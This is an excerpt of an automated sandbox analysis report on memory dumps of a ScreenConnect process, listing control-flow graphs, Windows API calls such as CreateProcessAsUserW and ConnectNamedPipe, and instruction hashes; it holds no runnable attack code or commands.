                                                                                    control_flow_graph 384 51a6530-51a6545 385 51a655a-51a6561 384->385 386 51a6547-51a654a 384->386 389 51a6566-51a65aa call 51a5fdc 385->389 387 51a6550-51a6559 386->387 388 51a6614-51a6628 386->388 390 51a662a 388->390 391 51a65ee-51a65f7 388->391 410 51a65af-51a65b4 389->410 395 51a6636-51a663f 390->395 393 51a65f9-51a6613 391->393 394 51a6654-51a6668 391->394 398 51a666a-51a66b6 394->398 399 51a66c0 394->399 402 51a66c2-51a66f8 K32EnumProcesses 398->402 403 51a66b8-51a66bd 398->403 399->402 404 51a66fa-51a6700 402->404 405 51a6701-51a6729 402->405 403->399 404->405 411 51a65ba-51a65bd 410->411 412 51a6640-51a664d 410->412 413 51a65bf-51a65ec 411->413 414 51a662c-51a6631 411->414 412->394 413->391 413->395 414->389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 528407946e899df07106ac7daefdf837c76de02468fbbc0b11d57bf4c2ea4241
                                                                                    • Instruction ID: 8f3e094f378587c3f65dc90d67c33ac9e605d3aa4c3d08ce48322fa86ad5ebab
                                                                                    • Opcode Fuzzy Hash: 528407946e899df07106ac7daefdf837c76de02468fbbc0b11d57bf4c2ea4241
                                                                                    • Instruction Fuzzy Hash: 75519F76A007058FCB24CFA9D884AAEBBF5FF88310F14892ED45AD7641D734E905CBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 419 51bfb54-51bfb5d 420 51bfb78-51bfbbc 419->420 421 51bfb5f-51bfb74 419->421 422 51bfbbe-51bfbe3 420->422 423 51bfc10-51bfc93 CreateFileA 420->423 421->420 422->423 426 51bfbe5-51bfbe7 422->426 432 51bfc9c-51bfcda 423->432 433 51bfc95-51bfc9b 423->433 427 51bfc0a-51bfc0d 426->427 428 51bfbe9-51bfbf3 426->428 427->423 430 51bfbf7-51bfc06 428->430 431 51bfbf5 428->431 430->430 434 51bfc08 430->434 431->430 438 51bfcea 432->438 439 51bfcdc-51bfce0 432->439 433->432 434->427 441 51bfceb 438->441 439->438 440 51bfce2 439->440 440->438 441->441
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 051BFC7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: eea37fea9c0bbf6df70d25d0215eadf9643f5a8b69a32f7e66fee3fde8e26bec
                                                                                    • Instruction ID: a752bc498c4254de7bd77b2602e0c0783953a635cb3ef9d0616e9dc8b8a6342f
                                                                                    • Opcode Fuzzy Hash: eea37fea9c0bbf6df70d25d0215eadf9643f5a8b69a32f7e66fee3fde8e26bec
                                                                                    • Instruction Fuzzy Hash: 2B515CB1D10249DFEB10CFA9C985BDDBBF1BB48304F248529E808AB351D7B59945CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 442 51bfb60-51bfbbc 443 51bfbbe-51bfbe3 442->443 444 51bfc10-51bfc93 CreateFileA 442->444 443->444 447 51bfbe5-51bfbe7 443->447 453 51bfc9c-51bfcda 444->453 454 51bfc95-51bfc9b 444->454 448 51bfc0a-51bfc0d 447->448 449 51bfbe9-51bfbf3 447->449 448->444 451 51bfbf7-51bfc06 449->451 452 51bfbf5 449->452 451->451 455 51bfc08 451->455 452->451 459 51bfcea 453->459 460 51bfcdc-51bfce0 453->460 454->453 455->448 462 51bfceb 459->462 460->459 461 51bfce2 460->461 461->459 462->462
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 051BFC7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: d701a793d7b197a07a3d6be0f2c26df55e47fd8bb8841b25a639b495a3b33874
                                                                                    • Instruction ID: 5b9e3b353e40b1290c3dca5c02adc5cb4955e2818bc8b2ceeda415854dca3444
                                                                                    • Opcode Fuzzy Hash: d701a793d7b197a07a3d6be0f2c26df55e47fd8bb8841b25a639b495a3b33874
                                                                                    • Instruction Fuzzy Hash: 074148B1D10249DFEB10CFA9C985BDEBBF1BB48304F248529E808AB351D7B59885CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 463 51b2639-51b2691 464 51b269c-51b26a0 463->464 465 51b2693-51b2699 463->465 466 51b26a8-51b26bd 464->466 467 51b26a2-51b26a5 464->467 465->464 468 51b26cb-51b2722 CreateProcessAsUserW 466->468 469 51b26bf-51b26c8 466->469 467->466 470 51b272b-51b2753 468->470 471 51b2724-51b272a 468->471 469->468 471->470
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 051B270F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 27bd0995e9a03087a4de92c1176362a406a484a3eee319cdb47fa7fc207ff484
                                                                                    • Instruction ID: e033c7260ff96a6f8b7c827b6e7f79b2b007d5670ae0d96bbb81f0ba6525ba40
                                                                                    • Opcode Fuzzy Hash: 27bd0995e9a03087a4de92c1176362a406a484a3eee319cdb47fa7fc207ff484
                                                                                    • Instruction Fuzzy Hash: 3A41247690024ADFDF11CFA9C880ADEBBF2FF48310F14842AE928A7250D775A955CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 485 51b2c8d-51b2d26 ConnectNamedPipe 487 51b2d28-51b2d2e 485->487 488 51b2d2f-51b2d71 485->488 487->488 492 51b2d7b 488->492 493 51b2d73 488->493 494 51b2d7c 492->494 493->492 494->494
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 051B2D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: d292390da190c0a5f2cc2a05af87fe1e2f59654628fc040f5af571d398a41c17
                                                                                    • Instruction ID: 49baad4dc5d4da2db0e1ef565ed1b75550b337277a6982341b65d46d752d8f96
                                                                                    • Opcode Fuzzy Hash: d292390da190c0a5f2cc2a05af87fe1e2f59654628fc040f5af571d398a41c17
                                                                                    • Instruction Fuzzy Hash: DE3120B4C00218DFDB24CFAAD488BDEBBF4AF08300F14846AE819AB254C7759845CF91
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 051B2D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: 3c8ccdcde6f3548e5a5a159c26716e182a19bb4fb602e56651b311df5935d722
                                                                                    • Instruction ID: 5ad6693e18cf5a0e363eb0bcd8dfb9713ef7c6dfb7a090f684befe259d853ad8
                                                                                    • Opcode Fuzzy Hash: 3c8ccdcde6f3548e5a5a159c26716e182a19bb4fb602e56651b311df5935d722
                                                                                    • Instruction Fuzzy Hash: DB2102B4D00258DFDB24CFAAD484BDEBBF5AF48700F24845AE819AB354C7759805CFA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 562 51a5fdc-51a66b6 564 51a66b8-51a66c0 562->564 565 51a66c2-51a66f8 K32EnumProcesses 562->565 564->565 567 51a66fa-51a6700 565->567 568 51a6701-51a6729 565->568 567->568
                                                                                    APIs
                                                                                    • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 051A66E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumProcesses
                                                                                    • String ID:
                                                                                    • API String ID: 84517404-0
                                                                                    • Opcode ID: b7a4c973bef9a42262498439b3b339e6f98805f75477633dbb2e8d2ff274f76e
                                                                                    • Instruction ID: 95ecbff341dff9f379f3e87c8c715023b8440cbd98876c8b87cc392a149d50e8
                                                                                    • Opcode Fuzzy Hash: b7a4c973bef9a42262498439b3b339e6f98805f75477633dbb2e8d2ff274f76e
                                                                                    • Instruction Fuzzy Hash: 322116B6D002099FDB14CF9AD885BDEBBF4FB88310F14842ED519A7240C779A945CBA5
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,051B3046), ref: 051B30EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: 97acb276e053f4fdb921d1c3d9c6cee27ba3c956eba28c602a648ad40b23f26c
                                                                                    • Instruction ID: 5fe8c2be050187bf80b448b673a54d7c3269cd3790154968aebaf9fef9d268bc
                                                                                    • Opcode Fuzzy Hash: 97acb276e053f4fdb921d1c3d9c6cee27ba3c956eba28c602a648ad40b23f26c
                                                                                    • Instruction Fuzzy Hash: AE2115728042498FDB24CF9AC444BEEBBF4EB48310F14886DD829A7241C779A545CFA1
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,051B3046), ref: 051B30EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821482819.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: 0c8777fe6f0754f46aae5e2eb2ca9b9e890e5a8802bd7968df3b649bf00ae0fc
                                                                                    • Instruction ID: 8eae4fe43696de09337ef12fcc0c66ad3fb869ab365b6fa60fc53e2bd2dc43fd
                                                                                    • Opcode Fuzzy Hash: 0c8777fe6f0754f46aae5e2eb2ca9b9e890e5a8802bd7968df3b649bf00ae0fc
                                                                                    • Instruction Fuzzy Hash: 052133B28002498FDB10CFAAC444BDEFBF4EF88310F14882ED869A7241C379A545CFA1
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: cf82c6422682f0406c0a6379a8ab8750247fcd17e996cb3d02734fa76917c5e1
                                                                                    • Instruction ID: ee8d1dbc3ca63b35b1e27c5b5f714604d2dcd0b06c8821ac62b2870cc3094659
                                                                                    • Opcode Fuzzy Hash: cf82c6422682f0406c0a6379a8ab8750247fcd17e996cb3d02734fa76917c5e1
                                                                                    • Instruction Fuzzy Hash: B81103B6C002499FCB10CF9AC845BDEBBF4FB88320F14842AD419A7241D379A545CFA5
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: eebb86b333421248a4dc3891b1532d4739ac53af5979da8f68f303c0cea18c3b
                                                                                    • Instruction ID: 6041298f57efc01cd70847a7edda2d8f654362ed24acbd3959b14fb14c42f8e2
                                                                                    • Opcode Fuzzy Hash: eebb86b333421248a4dc3891b1532d4739ac53af5979da8f68f303c0cea18c3b
                                                                                    • Instruction Fuzzy Hash: 2B1103B6C00249CFCB20DF9AC544BAEBBF4FB48220F14846AD419A7241D379A945CFA5
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A67BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2821276933.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_51a0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: 34e260adf982fb68fc07ca838d2bd31dcb2dc832e24f49cc9cabcaf4f34c82eb
                                                                                    • Instruction ID: bee73e55b78d6eef538ed65cc691ce9328fdec74cf32e922b5114ae0ae682fb5
                                                                                    • Opcode Fuzzy Hash: 34e260adf982fb68fc07ca838d2bd31dcb2dc832e24f49cc9cabcaf4f34c82eb
                                                                                    • Instruction Fuzzy Hash: 83019E768142498FDF21CF95C8457EABBF4EF84324F188499D058A7242C739A44ACBA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2787979042.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_5cd000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d091abb613ea54ac5374d69608a60c1aff5e42a1973d07c8ff420495249f931e
                                                                                    • Instruction ID: d2665543ff43775815c13f85d375819d47e6c6e8d789242bf74709166d5f8d88
                                                                                    • Opcode Fuzzy Hash: d091abb613ea54ac5374d69608a60c1aff5e42a1973d07c8ff420495249f931e
                                                                                    • Instruction Fuzzy Hash: 1E2121B2500244DFDB01DF90D8C0F26BFB5FB88314F20856CE8098B246C336D846CAB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2787979042.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_5cd000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                    • Instruction ID: e5f9656e12372b964179b9aafcaa777aa8a091c7a0f2b6d6703ee6a767d340fa
                                                                                    • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                    • Instruction Fuzzy Hash: 55118176504280DFCB16CF50D9C4B16BFB2FB98324F24C6ADD8094B656C336D856CBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2787979042.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_5cd000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 349a021a83efb9e341b4faf956a7dd921382253b2b4eb42474550671df340515
                                                                                    • Instruction ID: aa94c4093aba037c0504f0f833172d5f146eb7d0b1525fd40a7507226a61b143
                                                                                    • Opcode Fuzzy Hash: 349a021a83efb9e341b4faf956a7dd921382253b2b4eb42474550671df340515
                                                                                    • Instruction Fuzzy Hash: 6401FC71404304AEE7104AA9DC88F67BFE8FF41720F14C46DDC055A243D3759805C6B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2787979042.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_5cd000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 35801c9306d0eb9332d949566390b9ebbbac58fc6a5bb9139309fd885c2c4f7c
                                                                                    • Instruction ID: 3a4c803fc0fad33c1cb6614a595c492dc77d7d86f903a633f4288428a1ffcebe
                                                                                    • Opcode Fuzzy Hash: 35801c9306d0eb9332d949566390b9ebbbac58fc6a5bb9139309fd885c2c4f7c
                                                                                    • Instruction Fuzzy Hash: BE01526100E3C09FD7124B258C98B56BFB4EF53224F1980DBD888DF1A3D2695848C772
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 00CF4DBE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2791525079.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_cf0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: 2ecc4d63e77f2ebf519b1ea630098a703e320b8b5bb0341570bc9ad0ad1af024
                                                                                    • Instruction ID: 8671adf1df6035364f482629010f6c7ca7d45682a8a6585fd96c01d650fa2e66
                                                                                    • Opcode Fuzzy Hash: 2ecc4d63e77f2ebf519b1ea630098a703e320b8b5bb0341570bc9ad0ad1af024
                                                                                    • Instruction Fuzzy Hash: 51213471900228DFEB60CF59DC44BAAFBB9FB49300F1086D9D50CA7280C7756A88CF92

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.8%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:100%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 13541 7ffb4a8b3642 13542 7ffb4a8d50f0 CreateNamedPipeW 13541->13542 13544 7ffb4a8d5223 13542->13544
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 888445274c0ad06c0c6b76ce9d22d6d5c0ad55792c87b00a7c3b4aa7621ca8b7
                                                                                    • Instruction ID: d3b20b193ba99fba871f51cdc8e5a81ede5bb9c1c0f2bee76fc1ecca4696ebcd
                                                                                    • Opcode Fuzzy Hash: 888445274c0ad06c0c6b76ce9d22d6d5c0ad55792c87b00a7c3b4aa7621ca8b7
                                                                                    • Instruction Fuzzy Hash: C482E5B5A0CA474BE7A9BE38C569BB977D5EF98300F6441FDD48DC76C2DD28A8068340
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: c725e86f19a1ca213a715c33c023adecd422f17a8ad7c15ec22ff19d95db5cfe
                                                                                    • Instruction ID: eb43d57d2cde08ff402621e387d134c737b298056f91374133aed313710f6a8a
                                                                                    • Opcode Fuzzy Hash: c725e86f19a1ca213a715c33c023adecd422f17a8ad7c15ec22ff19d95db5cfe
                                                                                    • Instruction Fuzzy Hash: 3DF1C4B5E0CA074AE7A9BF38C665EB967D6EF98300F6441BDD44EC75C2DD2CA8068240

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 778 7ffb4abc6809-7ffb4abc680f 779 7ffb4abc6811-7ffb4abc6814 778->779 780 7ffb4abc6880-7ffb4abc6892 778->780 781 7ffb4abc6816-7ffb4abc6858 call 7ffb4abc59c0 call 7ffb4abc59d0 call 7ffb4abc57f8 779->781 782 7ffb4abc6895-7ffb4abc689c 779->782 780->782 796 7ffb4abc68c3-7ffb4abc68c7 781->796 806 7ffb4abc685a-7ffb4abc6865 781->806 784 7ffb4abc69d8-7ffb4abc6a3a 782->784 785 7ffb4abc689d-7ffb4abc68bf 782->785 803 7ffb4abc6e48-7ffb4abc6e66 call 7ffb4abc0c40 * 2 784->803 804 7ffb4abc6a40-7ffb4abc6a5e call 7ffb4abc0c40 * 2 784->804 785->796 799 7ffb4abc68c9-7ffb4abc68d7 796->799 805 7ffb4abc691c-7ffb4abc694e 799->805 820 7ffb4abc6e6c-7ffb4abc6e73 803->820 821 7ffb4abc6f72-7ffb4abc6f7d 803->821 822 7ffb4abc6a64-7ffb4abc6a6c 804->822 823 7ffb4abc6cde-7ffb4abc6cfc call 7ffb4abc0c40 * 2 804->823 806->805 810 7ffb4abc686b-7ffb4abc687d 806->810 810->799 813 7ffb4abc687f 810->813 813->780 824 7ffb4abc6e86-7ffb4abc6e88 820->824 825 7ffb4abc6e75-7ffb4abc6e84 820->825 828 7ffb4abc6a73-7ffb4abc6a76 822->828 839 7ffb4abc6d26-7ffb4abc6d55 call 7ffb4abc0c40 * 2 823->839 840 7ffb4abc6cfe-7ffb4abc6d08 823->840 827 7ffb4abc6e8f-7ffb4abc6eb3 824->827 825->824 835 7ffb4abc6e8a 825->835 841 7ffb4abc6eb5-7ffb4abc6ed2 827->841 842 7ffb4abc6eff-7ffb4abc6f2f 827->842 831 7ffb4abc6a78-7ffb4abc6a7a 828->831 832 7ffb4abc6a7c-7ffb4abc6a8a 828->832 836 7ffb4abc6a8d-7ffb4abc6aa2 831->836 832->836 835->827 849 7ffb4abc6aa4-7ffb4abc6aa6 836->849 850 7ffb4abc6aa8-7ffb4abc6acc call 7ffb4abc5b00 * 2 836->850 887 7ffb4abc6d57-7ffb4abc6d59 839->887 888 7ffb4abc6d5b-7ffb4abc6d6a 839->888 844 7ffb4abc6d0a-7ffb4abc6d1a 840->844 845 7ffb4abc6d1c 840->845 851 7ffb4abc6ed8-7ffb4abc6efd 841->851 852 7ffb4abc6f7e-7ffb4abc6ff7 841->852 874 7ffb4abc6f35-7ffb4abc6f44 842->874 875 7ffb4abc6f31-7ffb4abc6f33 842->875 854 7ffb4abc6d1e-7ffb4abc6d1f 844->854 845->854 855 7ffb4abc6acf-7ffb4abc6ae4 849->855 850->855 851->842 879 7ffb4abc6ff9-7ffb4abc703d 852->879 880 7ffb4abc7040-7ffb4abc7096 852->880 854->839 870 7ffb4abc6ae6-7ffb4abc6ae8 855->870 871 7ffb4abc6aea-7ffb4abc6b0e call 7ffb4abc5b00 * 2 855->871 877 7ffb4abc6b11-7ffb4abc6b26 870->877 871->877 882 7ffb4abc6f47-7ffb4abc6f4e 874->882 875->882 899 7ffb4abc6b28-7ffb4abc6b2a 877->899 900 7ffb4abc6b2c-7ffb4abc6b50 call 7ffb4abc5b00 877->900 879->880 913 7ffb4abc7098-7ffb4abc7099 880->913 914 7ffb4abc709c-7ffb4abc70c0 880->914 885 7ffb4abc6f63-7ffb4abc6f64 882->885 886 7ffb4abc6f50-7ffb4abc6f61 882->886 892 7ffb4abc6f66-7ffb4abc6f6b 885->892 886->892 890 7ffb4abc6d6d-7ffb4abc6db1 887->890 888->890 903 7ffb4abc6dc4-7ffb4abc6dcc 890->903 904 7ffb4abc6db3-7ffb4abc6dbb 890->904 892->821 905 7ffb4abc6b53-7ffb4abc6b61 899->905 900->905 908 7ffb4abc6dde 903->908 909 7ffb4abc6dcd-7ffb4abc6dce 903->909 904->909 911 7ffb4abc6dbd-7ffb4abc6dc2 904->911 922 7ffb4abc6b63-7ffb4abc6b65 905->922 923 7ffb4abc6b67-7ffb4abc6b75 905->923 917 7ffb4abc6de4-7ffb4abc6e06 908->917 915 7ffb4abc6dd3-7ffb4abc6ddd call 7ffb4abc5b38 909->915 911->915 913->914 929 7ffb4abc70f2-7ffb4abc70fb 914->929 930 7ffb4abc70c2-7ffb4abc70d1 914->930 915->917 934 7ffb4abc6e08-7ffb4abc6e0a 917->934 935 7ffb4abc6e0c-7ffb4abc6e1b 917->935 927 7ffb4abc6b78-7ffb4abc6b79 922->927 923->927 936 7ffb4abc6b80-7ffb4abc6b81 927->936 932 7ffb4abc70d3-7ffb4abc70d4 930->932 933 7ffb4abc70d7-7ffb4abc70f1 930->933 932->933 937 7ffb4abc6e1e-7ffb4abc6e20 934->937 935->937 938 7ffb4abc6b88-7ffb4abc6b8f 936->938 937->821 941 7ffb4abc6e26-7ffb4abc6e34 937->941 938->823 942 7ffb4abc6b95-7ffb4abc6b9c 938->942 943 7ffb4abc6e36-7ffb4abc6e38 941->943 942->823 946 7ffb4abc6ba2-7ffb4abc6bb9 942->946 944 7ffb4abc6e24-7ffb4abc6e34 943->944 945 7ffb4abc6e38 943->945 944->943 945->803 945->944 949 7ffb4abc6bee-7ffb4abc6bf9 946->949 950 7ffb4abc6bbb-7ffb4abc6bcd 946->950 955 7ffb4abc6bfb-7ffb4abc6bfd 949->955 956 7ffb4abc6bff-7ffb4abc6c0e 949->956 953 7ffb4abc6bd3-7ffb4abc6be1 950->953 954 7ffb4abc6bcf-7ffb4abc6bd1 950->954 958 7ffb4abc6be4-7ffb4abc6be7 953->958 954->958 957 7ffb4abc6c11-7ffb4abc6c13 955->957 956->957 960 7ffb4abc6c19-7ffb4abc6c30 957->960 961 7ffb4abc6cc8-7ffb4abc6cda 957->961 958->949 960->961 965 7ffb4abc6c36-7ffb4abc6c53 960->965 961->823 968 7ffb4abc6c55-7ffb4abc6c5d 965->968 969 7ffb4abc6c5f 965->969 970 7ffb4abc6c61-7ffb4abc6c63 968->970 969->970 970->961 972 7ffb4abc6c65-7ffb4abc6c6f 970->972 973 7ffb4abc6c7d-7ffb4abc6c85 972->973 974 7ffb4abc6c71-7ffb4abc6c7b call 7ffb4abc3ce8 972->974 975 7ffb4abc6cb3-7ffb4abc6cc6 call 7ffb4abc5b28 973->975 976 7ffb4abc6c87-7ffb4abc6cac call 7ffb4abc5910 973->976 974->823 974->973 975->823 976->975
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.2825075186.00007FFB4ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_7ffb4abc0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: b1efd09ad4698458dedcd9b665b1e4284e04d6930c1f295d84c8e981ff450e64
                                                                                    • Instruction ID: 3269274b4454d873042f8ada8a87b95e4b85baf8c5f4550e282b8efa94ca33b4
